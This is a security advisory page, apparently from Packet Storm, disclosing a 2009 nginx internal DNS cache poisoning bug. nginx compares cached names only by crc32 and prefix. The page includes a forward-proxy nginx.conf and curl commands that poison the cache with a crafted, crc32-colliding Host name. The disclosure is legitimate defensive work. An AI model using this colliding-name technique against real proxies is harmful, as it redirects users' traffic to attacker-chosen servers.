what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nginx Cache Poisoning

nginx Cache Poisoning
Posted Sep 18, 2009
Authored by Matthew Dempsky

nginx suffers from an internal DNS cache poisoning vulnerability when configured as a forward proxy.

tags | advisory
SHA-256 | 4cfae3eff99753608f50e8287f21330f597d59e6bd520cb36cb9a99a65f4a931

nginx Cache Poisoning

Change Mirror Download
nginx maintains an internal DNS cache for resolved domain names.
However, when searching the cache, nginx only checks that the crc32 of
the names match and that the shorter name is a prefix of the longer
name. It does not check that the names are equal in length.

One way to exploit this is if nginx is configured as a forward proxy.
This is an atypical use case, but it has been discussed on the nginx
mailing list before[1].

For example, using this nginx.conf:

events {
worker_connections 1024;
}

http {
resolver 4.2.2.4;
server {
listen 8080;
location / {
proxy_pass http://$http_host$request_uri;
}
}
}

You can then run curl to see the cache poisoning in effect:

$ curl -H 'Host: www.google.com.9nyz309.crc32.dempsky.org'
http://127.0.0.1:8080/
<html>
<body>
Ho hum, nothing to see here, move along please.
</body>
</html>

$ curl -H 'Host: www.google.com' http://127.0.0.1:8080/
<html>
<body>
Oops, you shouldn't be asking me for http://www.google.com/!
</body>
</html>

(Restart nginx and run only the second command to see its expected
behavior; i.e., actually fetching http://www.google.com/.)

This works because crc32("www.google.com.") ==
crc32("www.google.com.9nyz309.crc32.dempsky.org."). The first request
cached the IP address for www.google.com.9nyz309.crc32.dempsky.org,
and then the second request used this IP address instead of querying
for www.google.com's real IP address because of the matching CRCs and
the common prefix.

[1] http://marc.info/?l=nginx&m=125257590425747&w=2
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close